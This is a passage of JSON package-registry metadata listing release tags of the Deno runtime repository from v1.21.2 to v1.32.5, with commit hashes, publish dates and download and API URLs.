enoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies